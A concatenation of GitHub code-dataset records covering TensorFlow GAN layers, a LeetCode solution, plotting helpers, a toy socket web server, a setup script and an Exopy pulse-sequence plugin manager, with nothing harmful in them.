tf.nn.embedding_lookup(weight, tf.argmax(inputs, axis=1))\n return inputs\n\n\ndef pixel_norm(inputs, epsilon=1e-8):\n inputs *= tf.rsqrt(tf.reduce_mean(tf.square(inputs), axis=1, keepdims=True) + epsilon)\n return inputs\n\n\ndef batch_stddev(inputs, group_size=4, epsilon=1e-8):\n shape = inputs.shape\n inputs = tf.reshape(inputs, [group_size, -1, *shape[1:]])\n inputs -= tf.reduce_mean(inputs, axis=0, keepdims=True)\n inputs = tf.square(inputs)\n inputs = tf.reduce_mean(inputs, axis=0)\n inputs = tf.sqrt(inputs + epsilon)\n inputs = tf.reduce_mean(inputs, axis=[1, 2, 3], keepdims=True)\n inputs = tf.tile(inputs, [group_size, 1, *shape[2:]])\n return inputs\n\n\ndef adaptive_instance_norm(inputs, latents, use_bias=True, center=True, scale=True,\n variance_scale=2, scale_weight=True, epsilon=1e-8):\n ''' Adaptive Instance Normalization\n [Arbitrary Style Transfer in Real-time with Adaptive Instance Normalization]\n (https://arxiv.org/pdf/1703.06868.pdf)\n '''\n # standard instance normalization\n inputs -= tf.reduce_mean(inputs, axis=[2, 3], keepdims=True)\n inputs *= tf.rsqrt(tf.reduce_mean(tf.square(inputs), axis=[2, 3], keepdims=True) + epsilon)\n\n if scale:\n with tf.variable_scope(\"scale\"):\n gamma = dense(\n inputs=latents,\n units=inputs.shape[1],\n use_bias=use_bias,\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n gamma = tf.reshape(\n tensor=gamma,\n shape=[-1, gamma.shape[1], 1, 1]\n )\n inputs *= gamma\n\n if center:\n with tf.variable_scope(\"center\"):\n beta = dense(\n inputs=latents,\n units=inputs.shape[1],\n use_bias=use_bias,\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n beta = tf.reshape(\n tensor=beta,\n shape=[-1, beta.shape[1], 1, 1]\n )\n inputs += beta\n\n return inputs\n\n\ndef apply_noise(inputs):\n noise = tf.random_normal([tf.shape(inputs)[0], 1, *inputs.shape[2:]])\n weight = tf.get_variable(\n name=\"weight\",\n shape=[inputs.shape[1]],\n initializer=tf.initializers.zeros()\n )\n weight = tf.reshape(weight, [1, -1, 1, 1])\n inputs += noise * weight\n return inputs\n","repo_name":"skmhrk1209/PGGAN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"73"} +{"seq_id":"21807842689","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n self.k = k\n self.res = None\n self.helper(root)\n return self.res\n\n def helper(self, node):\n if not node:\n return\n self.helper(node.left)\n self.k -= 1\n if self.k == 0:\n self.res = node.val\n return\n self.helper(node.right)","repo_name":"minas528/interviewPrep","sub_path":"230-kth-smallest-element-in-a-bst/230-kth-smallest-element-in-a-bst.py","file_name":"230-kth-smallest-element-in-a-bst.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"3534688752","text":"from typing import List, Union, Tuple, Dict\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\ndef colorFader(c1,c2,mix=0): #fade (linear interpolate) from color c1 (at mix=0) to c2 (mix=1)\n c1=np.array(mcolors.to_rgb(c1))\n c2=np.array(mcolors.to_rgb(c2))\n return mcolors.to_hex((1-mix)*c1 + mix*c2)\n\n\ndef descriptors(descriptors: List[np.ndarray], groupby: int, figsize: Tuple[int,int] = (16,16), varnames: Union[np.ndarray, list] = None, dimnames: Union[np.ndarray, list] = None, same_scale: bool = True, return_axes: bool = False, grid: bool = True, color_from: Union[str, List[str]] = \"blue\", color_to: Union[str, List[str]] = \"red\", groupcolors: int = None, **kwargs):\n # Rest\n n_features = len(descriptors)\n n_dimensions = descriptors[0].shape[1]//groupby\n if groupcolors is None:\n groupcolors = groupby\n\n # Color range\n if isinstance(color_from, str):\n color_from = [color_from]*n_features\n if isinstance(color_to, str):\n color_to = [color_to]*n_features\n assert (len(color_from) == n_features) and (len(color_from) == n_features), \"The number of specified colors must match the number of descriptors\"\n color_range = [\n [colorFader(mcolors.to_hex(c_from),mcolors.to_hex(c_to),v) for v in np.linspace(0,1,groupcolors)] \n for (c_from,c_to) in zip(color_from,color_to)\n ]\n\n # Initialize figure\n fig,ax = plt.subplots(nrows=n_features,ncols=n_dimensions,figsize=figsize,**kwargs)\n if ax.ndim == 1:\n ax = ax[:,None]\n for i,des in enumerate(descriptors):\n for j,val in enumerate(des.T):\n ax[i,j//groupby].plot(val,color=color_range[i][j%groupcolors])\n ax[i,j//groupby].set_xlim([0,val.size-1])\n \n # Set figure options\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]-1) for j in range(ax.shape[1])]\n [ax[i,j].set_yticks([]) for i in range(ax.shape[0]) for j in range(1,ax.shape[1])]\n if varnames is not None:\n [ax[i,0].set_ylabel(f\"{varnames[i]}\") for i in range(ax.shape[0])]\n else:\n [ax[i,0].set_ylabel(f\"Feat. {i+1}\") for i in range(ax.shape[0])]\n if dimnames is not None:\n [ax[0,j].set_title(f\"{dimnames[j]}\") for j in range(ax.shape[1])]\n else:\n [ax[0,j].set_title(f\"Dim. {j+1}\") for j in range(ax.shape[1])]\n # Set figure ylims\n if same_scale and \"sharey\" not in kwargs:\n for i in range(ax.shape[0]):\n ylims = [0,0]\n for j in range(ax.shape[1]):\n ylim = ax[i,j].get_ylim()\n ylims[0] = min([ylims[0],ylim[0]])\n ylims[1] = max([ylims[1],ylim[1]])\n \n for j in range(ax.shape[1]):\n ax[i,j].set_ylim(ylims)\n fig.tight_layout()\n fig.subplots_adjust(hspace=0.01)\n fig.align_ylabels(ax[:,0])\n\n if return_axes:\n return fig,ax\n\n\ndef path(descriptors: List[np.ndarray], figsize=(16,16), varnames: Union[np.ndarray, list] = None, dimnames: Union[np.ndarray, list] = None):\n # Rest\n n_features = len(descriptors)\n n_dimensions = descriptors[0].shape[1]\n\n # Initialize figure\n fig,ax = plt.subplots(nrows=n_features,ncols=n_dimensions,figsize=figsize)\n for i,des in enumerate(descriptors):\n for j,val in enumerate(des.T):\n col = 1/5*(j%5)\n ax[i,j].plot(val,color=[col,0,1-col])\n \n # Set figure options\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]-1) for j in range(ax.shape[1])]\n if varnames is not None:\n [ax[i,0].set_ylabel(f\"{varnames[i]}\") for i in range(ax.shape[0])]\n else:\n [ax[i,0].set_ylabel(f\"Feat. {i+1}\") for i in range(ax.shape[0])]\n if dimnames is not None:\n [ax[0,j].set_title(f\"Point {dimnames[j]}\") for j in range(ax.shape[1])]\n else:\n [ax[0,j].set_title(f\"Point {j+1}\") for j in range(ax.shape[1])]\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]) for j in range(ax.shape[1])]\n [ax[i,j].set_yticks([]) for i in range(ax.shape[0]) for j in range(ax.shape[1])]\n fig.tight_layout()\n fig.subplots_adjust(hspace=0.01,wspace=0.01)\n fig.align_ylabels(ax[:,0])\n\n\n\n","repo_name":"guillermo-jimenez/PyMKL","sub_path":"PyMKL/plot/__ops.py","file_name":"__ops.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"20308659885","text":"from PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \n\n\n\nclass ThisImage():\n \n def __init__(self, filename, colourLists):\n \n self.img = Image.new(mode = \"RGB\", size = (800, 800))\n self.draw = ImageDraw.Draw(self.img)\n self.font = ImageFont.truetype(\"glitchportal_app/novamono.ttf\", 32)\n NameList = filename.split(\".\")\n self.filename = NameList[0]\n document = open(filename)\n self.lines = document.readlines()\n self.colours = colourLists\n \n def now(self):\n \n saved = False\n print(self.filename + \".jpeg\")\n \n Y = 0\n X = 0\n \n for row in range(0, len(self.lines)):\n Line = self.lines[row].strip(\"\\n\")\n for char in range(0, len(Line)):\n self.draw.text((X, Y),Line[char],self.colours[row][char],font=self.font)\n X += 10\n Y += 16\n X = 0\n \n \n if not saved:\n self.img.save(self.filename + \".jpeg\")\n saved = True\n \n return self.filename + \".jpeg\"\n","repo_name":"RZSZT/test-site","sub_path":"glitchportal_app/showncapture.py","file_name":"showncapture.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71602486316","text":"# License: GNU Affero General Public License v3 or later\n\n# Find all operons belonging to specific subcategories based on pfam2ec and TIGRFAM2ec links\n\nfrom Genes import OperonCollection, CollectionCollection\n\nfrom log import return_logger\nlogger = return_logger(__name__, False)\n\ndef main(operons,domain2ec):\n categories_ec = {\n '2.1': 'Transferring_One-Carbon_Groups',\n '2.2': 'Transferring_Aldehyde_or_Ketonic_Groups',\n '2.3': 'Acyltransferases',\n '2.4': 'Glycosyltransferases',\n '2.5': 'Transferring_Alkyl_or_Aryl_Groups_Other_than_Methyl_Groups',\n '2.6': 'Transferring_Nitrogenous_Groups',\n '2.7': 'Transferring_Phosphorus-Containing_Groups',\n '2.8': 'Transferring_Sulfur-Containing_Groups'}\n \n categories_domains = {'Halogenase':['PF04820']}\n \n # First convert ec categories to domain categories - i.e. a dict containing a category name and all allowed domains.\n for ec_cl in categories_ec:\n ec_cl_full = 'EC:%s' %ec_cl\n category_name = categories_ec[ec_cl]\n domains = find_ec(domain2ec,ec_cl_full)\n categories_domains[category_name] = domains\n # Now assign the groups to the operons and the operoncollection\n operon_collections = assign_groups_to_operons(operons,categories_domains)\n return operon_collections\n \ndef find_ec(domain2ec,ec_q):\n out = set()\n for dom in domain2ec:\n ecs = domain2ec[dom]\n for ec in ecs:\n if ec_q in ec:\n out.add(dom)\n return(sorted(list(out)))\n \ndef assign_groups_to_operons(operons,categories_domains):\n operons_per_category = {}\n for operon in operons:\n categories = []\n for category in categories_domains:\n domains = categories_domains[category]\n if any([dom in operon.all_domains for dom in domains]):\n categories.append(category)\n if category not in operons_per_category:\n operons_per_category[category] = []\n operons_per_category[category].append(operon)\n operon.EC_groups = categories\n collections_per_group = {}\n for category in operons_per_category:\n operons_group = operons_per_category[category]\n collection = OperonCollection(dict([(operon.name,operon) for operon in operons_group]),collection_type='EC',name=category,\\\n descr='Operons containing a common enzyme class',prep=False)\n collections_per_group[category] = collection\n return collections_per_group\n \n\n\n \n'''Suggested interesting enzymes belonging to EC classes\n2.1 Transferring One-Carbon Groups\n2.2 Transferring Aldehyde or Ketonic Groups\n2.3 Acyltransferases\n2.4 Glycosyltransferases\n2.5 Transferring Alkyl or Aryl Groups, Other than Methyl Groups\n2.6 Transferring Nitrogenous Groups\n2.7 Transferring Phosphorus-Containing Groups\n2.8 Transferring Sulfur-Containing Groups\n\nAdditionally, for halogen transfer\n\nPF04820\tTrp_halogenase\tTryptophan halogenase\n\nPossibly also:\nhttps://www.nature.com/articles/nchembio.1649\n--> PF13640\n--> PF05721\n'''\n\n\n\n","repo_name":"Alexamk/decRiPPter","sub_path":"lib/group_operons_EC.py","file_name":"group_operons_EC.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"33645550761","text":"#!/usr/bin/env python3 \n# encoding: utf-8 \n\"\"\"\n@author: crkylin\n@contact: crkylin@gmail.com \n@site: \n@file: webserver.py \n@time: 4/3/2018 3:02 PM \n\"\"\"\n#import socket module\nfrom socket import *\n#Create a welcome socket\nserverPort = 8081\nserverSocket = socket(AF_INET, SOCK_STREAM)\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is running\")\nwhile True:\n\n connctionSocket, addr = serverSocket.accept()\n try:\n message = connctionSocket.recv(1024)\n fileName = message.split()[1]\n f = open(fileName[1:])\n outputdata = f.read()\n print(outputdata)\n # Send one HTTP header line into socket\n http_response = b\"HTTP/1.1 200 OK\\r\\n\\r\\n\"\n # Send the content of the requeted file to the client\n connctionSocket.sendall(http_response + outputdata.encode(\"utf8\"))\n connctionSocket.close()\n\n except IOError:\n # Send response message for file not found\n http_response = b'HTTP/1.1 404 Not Found\\r\\n\\r\\n'\n f = open('404.html')\n outputdata = f.read()\n connctionSocket.send(http_response + outputdata.encode(\"utf8\"))\n\n connctionSocket.close()\n\n\n#DONE! v1.0.1\n#Fix the problem that the server down after a connection close DONE:Do not close the welcome socket after a loop\n","repo_name":"chrolum/Note","sub_path":"computerNetworking/webServer/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11611766216","text":"#! /usr/bin/python\nimport os\n\nfrom utils.setup_toolbox import mac_address, get_serial, get_facility_name\n\n\ndef configure_site():\n \"\"\"\n configures toolbox\n :return:\n \"\"\"\n # Configures the site\n # install pip\n print(\"********************\")\n print(\"*** WELCOME TO TOOBOX-OFFLINE-EXPORTER FOR POINT OF CARE (POC) ***\")\n print(\"Starting ..........\")\n print(\"1. Update modules\")\n answer = os.system(\"sudo apt-get update\")\n print(\"Step 2: Install Pip.\")\n os.system(\"sudo apt install python-pip\")\n print(\"Step3 : install python environment\")\n os.system(\"sudo apt install virtualenv\")\n os.system(\"virtualenv flask\")\n print(\"Downloading requirements requirements .....\")\n #os.system(\". flask/bin/activate && pip install -r requirements.txt \")\n os.system(\"cd packages && pip download -r ../requirements.txt \")\n\n print(\"******************** ABOUT TO FINISH ********************\")\n os.system(\". flask/bin/activate && python -c 'from utils.setup_toolbox import \"\n \"offline_setup; \"\n \"offline_setup()'\")\n print(\"*********** END - OFFLINE SETUP COMPLETE :) !!!! *****************\")\n\n return True\n\n\ndef main():\n \"\"\"\n startup function\n :return: boolean\n \"\"\"\n configure_site()\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoxDevOps/toolbox-offline-exporter-poc","sub_path":"offline-setup.py","file_name":"offline-setup.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"44310956908","text":"from tkinter import *\nimport CellClass\n\n\nwidth = height = 720\nw = 40\n\ncols = width // w\nrows = height // w\n\ncells_grid = []\ncells_stek = []\n\nroot = Tk()\ncanvas = Canvas(root, width=width, height=height, bg=\"black\")\ncanvas.pack()\n\nfor i in range(cols):\n for j in range(rows):\n cells_grid.append(CellClass.Cell(i, j, canvas, w))\n\ncurrent = cells_grid[0]\ndef removeWalls(cell1, cell2):\n x = cell1.i - cell2.i\n if x == 1:\n cell1.walls[3] = False\n cell2.walls[1] = False\n elif x == -1:\n cell2.walls[3] = False\n cell1.walls[1] = False\n \n y = cell1.j - cell2.j\n if y == 1:\n cell1.walls[0] = False\n cell2.walls[2] = False\n elif y == -1:\n cell2.walls[0] = False\n cell1.walls[2] = False\n \n\ndef draw():\n \n global current\n \n canvas.delete(\"all\")\n \n for cell in cells_grid:\n cell.show()\n \n current.visited = True\n current.highlight()\n \n next_cell = current.checkNeighbours(cells_grid)\n if next_cell:\n next_cell.visited = True\n \n cells_stek.append(current)\n \n removeWalls(current, next_cell)\n \n current = next_cell\n elif len(cells_stek) > 0:\n current = cells_stek.pop()\n \n \n root.after(10, draw)\n \ndraw()\nroot.mainloop() ","repo_name":"immortalBan/Finashe4ka","sub_path":"Практикум по программированию/Практика 3/MazeGenerator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"73257551596","text":"import os\nimport logging\nimport enaml\n\nfrom watchdog.observers import Observer\nfrom atom.api import (Dict, List, Str, Typed, ForwardTyped)\nfrom exopy.utils.plugin_tools import (HasPreferencesPlugin,\n ExtensionsCollector,\n DeclaratorsCollector)\nfrom exopy.utils.watchdog import SystematicFileUpdater\n\nfrom .pulse import Pulse\nfrom .filters import SequenceFilter\nfrom .utils.sequences_io import load_sequence_prefs\nfrom .declarations import (Sequence, Sequences, SequenceConfig,\n SequenceConfigs, Contexts, Context, Shapes, Shape)\nfrom .shapes.modulation import Modulation\nfrom .infos import SequenceInfos, PulseInfos\nfrom .sequences.template_sequence import TemplateSequence\n\nwith enaml.imports():\n from .pulse_view import PulseView\n from .sequences.views.template_view import TemplateSequenceView\n\n\nFILTERS_POINT = 'exopy.pulses.filters'\nSEQUENCES_POINT = 'exopy.pulses.sequences'\nCONFIGS_POINT = 'exopy.pulses.configs'\nCONTEXTS_POINT = 'exopy.pulses.contexts'\nSHAPES_POINT = 'exopy.pulses.shapes'\n\nMODULE_ANCHOR = 'exopy_pulses'\n\n\ndef workspace_state():\n from .workspace.workspace import SequenceEditionSpaceState\n return SequenceEditionSpaceState\n\n\ndef workspace():\n from .workspace.workspace import SequenceEditionSpace\n return SequenceEditionSpace\n\n\nclass PulsesManagerPlugin(HasPreferencesPlugin):\n \"\"\"Plugin responsible for managing pulses.\n\n \"\"\"\n #: Folders containings templates which should be loaded.\n templates_folders = List() # .tag(pref=True) # TODO harcoded currently\n\n #: List of all known sequences and template-sequences.\n sequences = List(Str())\n\n #: List of all known contexts\n contexts = List(Str())\n\n #: List of all known shape.\n shapes = List(Str())\n\n #: List of all known filters:\n filters = List()\n\n #: Reference to the workspace or None if the workspace is not active.\n workspace = ForwardTyped(workspace)\n\n #: Reference to the workspace state.\n workspace_state = ForwardTyped(workspace_state)\n\n def start(self):\n \"\"\" Start the plugin life-cycle.\n\n This method is called by the framework at the appropriate time.\n It should never be called by user code.\n\n \"\"\"\n super(PulsesManagerPlugin, self).start()\n core = self.workbench.get_plugin('enaml.workbench.core')\n core.invoke_command('exopy.app.errors.enter_error_gathering')\n\n state = core.invoke_command('exopy.app.states.get',\n {'state_id': 'exopy.app.directory'})\n\n p_dir = os.path.join(state.app_directory, 'pulses')\n # Create pulses subfolder if it does not exist.\n if not os.path.isdir(p_dir):\n os.mkdir(p_dir)\n\n temp_dir = os.path.join(p_dir, 'templates')\n # Create templates subfolder if it does not exist.\n if not os.path.isdir(temp_dir):\n os.mkdir(temp_dir)\n\n self.templates_folders = [temp_dir]\n\n # Start the Declarators and Extensions collectors to collect\n # all elements of the plugin that are declared through enaml\n # declarations\n self._filters = ExtensionsCollector(workbench=self.workbench,\n point=FILTERS_POINT,\n ext_class=SequenceFilter)\n\n self._configs = DeclaratorsCollector(workbench=self.workbench,\n point=CONFIGS_POINT,\n ext_class=(SequenceConfig,\n SequenceConfigs))\n\n self._sequences = DeclaratorsCollector(workbench=self.workbench,\n point=SEQUENCES_POINT,\n ext_class=(Sequences, Sequence))\n\n self._contexts = DeclaratorsCollector(workbench=self.workbench,\n point=CONTEXTS_POINT,\n ext_class=(Contexts, Context))\n\n self._shapes = DeclaratorsCollector(workbench=self.workbench,\n point=SHAPES_POINT,\n ext_class=(Shapes, Shape))\n\n # Bind the observers before starting the collectors so that they will\n # update the lists of known seq, configs, filters, contexts...\n self._bind_observers()\n\n self._sequences.start()\n self._configs.start()\n self._filters.start()\n self._contexts.start()\n self._shapes.start()\n\n # Populate the Pulse Info Object\n self._pulse_infos = PulseInfos()\n self._pulse_infos.cls = Pulse\n self._pulse_infos.view = PulseView\n\n core.invoke_command('exopy.app.errors.exit_error_gathering')\n\n def stop(self):\n \"\"\" Stop the plugin life-cycle.\n\n This method is called by the framework at the appropriate time.\n It should never be called by user code.\n\n \"\"\"\n super(PulsesManagerPlugin, self).stop()\n self._unbind_observers()\n self._template_sequences_data.clear()\n self._template_sequences_infos.clear()\n\n # Stop all Extension/DeclaratorCollectors\n self._filters.stop()\n self._configs.stop()\n self._sequences.stop()\n self._contexts.stop()\n self._shapes.stop()\n\n def get_item_infos(self, item_id):\n \"\"\"Give access to an item infos.\n\n NB : an item can be a sequence or a pulse.\n\n Parameters\n ----------\n item_id : unicode\n The id of the requested item.\n\n Returns\n -------\n item_infos : ItemInfos or None\n The required item infos or None if it was not found.\n\n \"\"\"\n if item_id == \"exopy_pulses.Pulse\":\n return self._pulse_infos\n if item_id in self._sequences.contributions:\n return self._sequences.contributions[item_id]\n elif item_id in self._template_sequences_infos:\n t_info = self._template_sequences_infos[item_id]\n if not t_info.metadata['loaded']:\n config, doc = load_sequence_prefs(t_info.metadata['path'])\n t_info.metadata['template_config'] = config\n t_info.metadata['template_doc'] = doc\n t_info.metadata['loaded'] = True\n return t_info\n elif item_id == \"exopy_pulses.__template__\":\n infos = SequenceInfos()\n infos.cls = TemplateSequence\n infos.view = TemplateSequenceView\n return infos\n else:\n return None\n\n def get_item(self, item_id, view=False):\n \"\"\"Access a given item class.\n\n Parameters\n ----------\n item_id : unicode\n Id of the item for which to return the actual class.\n\n view : bool, optional\n Whether or not to return the view assoicated with the item.\n\n Returns\n -------\n item_cls : type or None\n Class associated to the requested item or None if the item was not\n found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if requested.\n\n \"\"\"\n infos = self.get_item_infos(item_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n def get_items(self, item_ids):\n \"\"\"Access the classes associated to a set of items.\n\n Parameters\n ----------\n item_ids : list(unicode)\n Ids of the item for which to return the actual class.\n\n Returns\n -------\n items_cls : dict\n Dictionary mapping the requested items to the actual classes.\n\n missing : list\n List of items that were not found.\n\n \"\"\"\n items_cls = {}\n missing = []\n for t in item_ids:\n res = self.get_item(t)\n if res:\n items_cls[t] = res\n else:\n missing.append(t)\n\n return items_cls, missing\n\n def get_context_infos(self, context_id):\n \"\"\"Give access to a context infos.\n\n Parameters\n ----------\n context_id : unicode\n Id of the requested context.\n\n Returns\n -------\n context_infos : ContextInfos or None\n Infos for the requested context or None if the context was not\n found.\n\n \"\"\"\n return self._contexts.contributions.get(context_id)\n\n def get_context(self, context_id, view=False):\n \"\"\"Access the class associated with a context.\n\n Parameters\n ----------\n context_id : unicode\n Id of the context for which to return the class\n\n view : bool, optional\n Whether or not to return the view associated with context.\n\n Returns\n -------\n context_cls : type or None\n Class associated to the requested context or None if the context\n was not found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if requested.\n\n \"\"\"\n infos = self.get_context_infos(context_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n def get_shape_infos(self, shape_id):\n \"\"\" Give access to a shape infos.\n\n Parameters\n ----------\n shape : unicode\n Id of the requested shapes.\n view : bool\n When false, the view is not returned alongside the class.\n\n Returns\n -------\n shape_infos : ShapeInfos or None\n The required shape infos or None if the shape was not found.\n\n \"\"\"\n return self._shapes.contributions.get(shape_id)\n\n def get_shape(self, shape_id, view=False):\n \"\"\"Access the class associated with a shape.\n\n Parameters\n ----------\n shape_id : unicode\n Id of the shape for which to return the class\n\n view : bool, optional\n Whether or not to return the view associated with context.\n\n Returns\n -------\n context_cls : type or None\n Class associated to the requested shape or None if the shape\n was not found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if requested.\n\n \"\"\"\n infos = self.get_shape_infos(shape_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n # TODO for future easiness of extension\n # Note that the pulse view should be updated too\n def get_modulation_infos(self, modulation_id):\n \"\"\"\n \"\"\"\n raise NotImplementedError()\n\n def get_modulation(self, modulation_id, view=False):\n \"\"\"Get the modulation class.\n\n \"\"\"\n if modulation_id == 'exopy_pulses.Modulation':\n return Modulation\n else:\n return None\n\n def get_config(self, sequence_id):\n \"\"\" Access the proper config for a sequence.\n\n Parameters\n ----------\n sequence_id : str\n Id of the sequence for which a config is required\n\n Returns\n -------\n config : tuple\n Tuple containing the config object requested, and its visualisation\n\n Notes\n -----\n It is the responsability of the user to properly set the root attribute\n of the returned config object.\n\n \"\"\"\n templates = self._template_sequences_data\n if sequence_id in templates:\n config_infos = self._configs.contributions['__template__']\n conf_cls = config_infos.cls\n conf_view = config_infos.view\n t_config, t_doc = load_sequence_prefs(templates[sequence_id])\n conf = conf_cls(manager=self,\n template_config=t_config,\n template_doc=t_doc,\n root=self.workspace.state.sequence)\n view = conf_view(model=conf)\n return conf, view\n\n elif sequence_id in self._sequences.contributions:\n configs = self._configs.contributions\n # Look up the hierarchy of the selected sequence to get the\n # appropriate SequenceConfig\n sequence_class = self._sequences.contributions[sequence_id].cls\n for i_class in type.mro(sequence_class):\n if i_class in configs:\n conf_cls = configs[i_class].cls\n conf_view = configs[i_class].view\n conf = conf_cls(manager=self,\n sequence_class=sequence_class)\n view = conf_view(model=conf)\n return conf, view\n\n return None, None\n\n def list_sequences(self, filter_name='All'):\n \"\"\" Filter the known sequences using the specified filter.\n\n Parameters\n ----------\n filter_name : str\n Name of the filter to use\n\n Returns\n -------\n sequences : list(str) or None\n Sequences selected by the filter, or None if the filter does not\n exist.\n\n \"\"\"\n s_filter = self._filters.contributions.get(filter_name)\n if s_filter:\n # Remove items that should not be shown in the list\n sequences = self._sequences.contributions.copy()\n template_sequences_data = self._template_sequences_data.copy()\n\n try:\n sequences.pop('exopy_pulses.RootSequence')\n except KeyError: # pragma: no cover\n pass\n return s_filter.filter_sequences(sequences,\n template_sequences_data)\n else:\n logger = logging.getLogger(__name__)\n logger.warning(\"Did not find the filter \" + str(filter_name) +\n \" and returned zero elements.\")\n return []\n\n # --- Private API ---------------------------------------------------------\n\n #: Sequences implemented in Python\n _sequences = Typed(DeclaratorsCollector)\n\n #: Template sequences (store full path to .ini)\n _template_sequences_data = Dict(Str(), Str())\n\n #: Template sequences infos\n _template_sequences_infos = Dict(Str(), SequenceInfos)\n\n #: Info Object for Pulse\n _pulse_infos = Typed(PulseInfos)\n\n #: Sequence contexts.\n _contexts = Typed(DeclaratorsCollector)\n\n #: Task config dict for python tasks (task_class: (config, view))\n _shapes = Typed(DeclaratorsCollector)\n\n #: Contributed task filters.\n _filters = Typed(ExtensionsCollector)\n\n #: Configuration object used to insert new sequences in existing ones.\n _configs = Typed(DeclaratorsCollector)\n\n # Watchdog observer\n _observer = Typed(Observer, ())\n\n def _refresh_known_template_sequences(self):\n \"\"\"Refresh the known template sequences.\n\n \"\"\"\n templates = {}\n for path in self.templates_folders:\n if os.path.isdir(path):\n filenames = [f for f in os.listdir(path)\n if (os.path.isfile(os.path.join(path, f)) and\n f.endswith('.temp_pulse.ini'))]\n filenames.sort()\n for filename in filenames:\n template_name = filename[:-len('.temp_pulse.ini')]\n template_path = os.path.join(path, filename)\n\n # Beware redundant names are overwrited\n templates[template_name] = template_path\n else:\n logger = logging.getLogger(__name__)\n logger.warning('{} is not a valid directory'.format(path))\n\n self._template_sequences_data = templates\n aux = (list(self._sequences.contributions) +\n list(templates))\n\n self.sequences = aux\n self._refresh_template_sequences_infos()\n\n def _refresh_template_sequences_infos(self):\n \"\"\" Refresh the known template sequence infos.\n\n \"\"\"\n # TODO Should be more proper in case of update\n\n templates = self._template_sequences_data\n templates_infos = {}\n\n for template_name, template_path in templates.items():\n\n metadata = {'is_template': True, 'path': template_path,\n 'loaded': False}\n infos = SequenceInfos(metadata=metadata)\n infos.cls = TemplateSequence\n infos.view = TemplateSequenceView\n templates_infos[template_name] = infos\n\n self._template_sequences_infos = templates_infos\n\n def _update_filters(self, change):\n \"\"\" Update the list of known filters.\n\n \"\"\"\n self.filters = list(self._filters.contributions.keys())\n\n def _update_known_contexts(self, change):\n \"\"\" Update the list of known contexts.\n\n \"\"\"\n self.contexts = list(self._contexts.contributions.keys())\n\n def _update_known_sequences(self, change):\n \"\"\" Update the list of known sequences.\n\n \"\"\"\n self.sequences = list(self._sequences.contributions.keys())\n\n #: Always refresh the list of known templates after refreshing\n #: sequences, as we could have just added a template.\n self._refresh_known_template_sequences()\n\n def _update_known_shapes(self, change):\n \"\"\" Update the list of known shapes.\n\n \"\"\"\n self.shapes = list(self._shapes.contributions.keys())\n\n def _bind_observers(self):\n \"\"\" Setup the observers for the plugin.\n\n \"\"\"\n for folder in self.templates_folders:\n handler = SystematicFileUpdater(\n self._refresh_known_template_sequences)\n self._observer.schedule(handler, folder, recursive=True)\n\n self._observer.start()\n\n self._contexts.observe('contributions', self._update_known_contexts)\n self._shapes.observe('contributions', self._update_known_shapes)\n self._sequences.observe('contributions', self._update_known_sequences)\n self._filters.observe('contributions', self._update_filters)\n\n self.observe('templates_folders', self._update_templates)\n\n def _unbind_observers(self):\n \"\"\" Remove the observers for the plugin.\n\n \"\"\"\n self.unobserve('templates_folders', self._update_templates)\n self._filters.unobserve('contributions', self._update_filters)\n self._observer.unschedule_all()\n self._observer.stop()\n self._observer.join()\n\n def _update_templates(self, change):\n \"\"\"Observer ensuring that we observe the right template folders.\n\n \"\"\"\n self._observer.unschedule_all()\n\n for folder in self.templates_folders:\n if not os.path.isdir(folder):\n continue\n handler = SystematicFileUpdater(\n self._refresh_known_template_sequences)\n self._observer.schedule(handler, folder, recursive=True)\n\n self._refresh_known_template_sequences()\n","repo_name":"Exopy/exopy_pulses","sub_path":"exopy_pulses/pulses/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":19268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41559678712","text":"'''\nO seguinte programa pega dados da api alpha_vantage, imprime os valores das ações do BTC na tela\n e emite um alerta caso a ultima variação do preco seja maior que 0.004\n'''\nimport pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nfrom alpha_vantage import cryptocurrencies\n\napi_key = 